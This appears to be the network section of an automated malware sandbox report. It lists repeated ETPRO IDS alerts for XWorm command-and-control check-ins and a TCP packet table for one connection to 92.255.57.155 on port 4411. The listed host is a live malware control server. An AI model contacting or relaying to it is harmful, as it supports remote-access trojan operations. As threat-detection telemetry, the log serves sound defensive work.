2024-12-29T09:50:43.309216+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:43.457218+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:43.624505+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:43.639295+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:44.266999+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:44.267988+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:44.477066+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:44.920968+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:44.955130+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:45.944505+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:45.946339+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:46.242158+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:46.243164+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:46.859638+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:47.070658+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:47.192304+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:47.322907+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:47.401350+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:47.401428+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:47.488304+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:47.533207+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:48.162862+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:48.163875+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:48.793146+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:48.840868+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:49.003677+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:49.004491+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:49.123194+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:49.124073+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:49.337934+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:49.453859+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:49.576067+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:50.636899+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:50.892561+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:51.362069+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:51.509171+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:51.648618+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:51.983669+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:51.988006+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:52.619465+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:52.796384+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:53.125986+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:53.700978+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:53.731329+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:54.777634+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:54.820056+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:55.030677+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:55.058821+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:55.269249+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:55.275245+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:55.522807+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:55.527332+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:55.605116+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:55.700544+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:55.902793+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:55.903636+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:56.714702+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:56.741940+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:56.925186+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:56.925894+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:57.072634+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:57.178951+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:57.235446+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:57.255964+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:57.298726+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:58.683506+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:58.684333+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:59.355347+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:59.996072+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:59.996115+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:00.101454+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:00.433841+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:00.435977+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:00.730443+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:00.731439+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:01.052735+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:01.053669+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:01.222593+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:01.223506+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:01.383482+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:01.462274+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:01.851191+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:01.852300+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:02.142201+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:02.465885+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:02.466846+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:02.630456+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:02.644798+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:02.905722+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:03.038662+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:03.665531+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:03.666431+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:03.875638+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:03.876501+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:03.996284+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:04.159384+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:04.504595+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:04.715168+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:04.796051+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:04.796099+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:04.868680+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:04.925368+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.125989+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.147864+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:05.182844+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.271370+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:05.336382+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.451332+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:05.572643+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.575348+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:05.781289+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.905298+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:06.024480+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:06.270171+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:06.480651+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:06.693300+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:29.367466+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:38.955890+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 09:49:01.853091955 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:01.972662926 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:01.972875118 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:02.054852962 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:02.174489021 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:16.109200001 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:16.228585005 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:16.560934067 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:16.606524944 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:16.610127926 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:16.729516983 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:29.301964045 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:29.356365919 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:30.013010025 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:30.132520914 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:30.464962959 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:30.466737032 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:30.586071014 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:43.950570107 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:44.069933891 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:44.402293921 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:44.404637098 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:44.524219036 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:57.898149014 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:58.072128057 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:58.404895067 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:58.406884909 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:49:58.526071072 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:59.328119040 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:49:59.372204065 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:02.575685978 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:02.695075035 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:03.029819012 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:03.047503948 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:03.166938066 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:03.513036966 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:03.632328033 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:03.632395029 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:03.751770973 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:03.841217995 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:03.961577892 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:03.961653948 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:03.964581966 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.012655973 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:04.124773979 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.125300884 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:04.172070980 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.215887070 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:04.244601965 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.245199919 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:04.292081118 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.340787888 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:04.364660025 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.364799976 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:04.455341101 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.484100103 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.484146118 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:04.603450060 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.665749073 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.667285919 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:04.786613941 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.786670923 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:04.814162970 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.856417894 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:04.948699951 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:04.950314999 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:05.069658995 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:05.122381926 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:05.241657972 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:05.294275999 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:05.413614035 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:05.413667917 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:05.532910109 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:05.692558050 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:05.714917898 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:05.834352016 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:05.902574062 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:05.913851023 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:06.033164024 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:06.044909000 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:06.060631990 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:06.113078117 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:06.153404951 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:06.220648050 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:06.223421097 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:06.342916965 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:06.356940031 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:06.477057934 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:06.477119923 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:06.596436024 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:06.596518993 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:06.715862989 CET	4411	49730	92.255.57.155	192.168.2.4
Dec 29, 2024 09:50:06.715941906 CET	49730	4411	192.168.2.4	92.255.57.155
Dec 29, 2024 09:50:06.835289001 CET	4411	49730	92.255.57.155	192.168.2.4
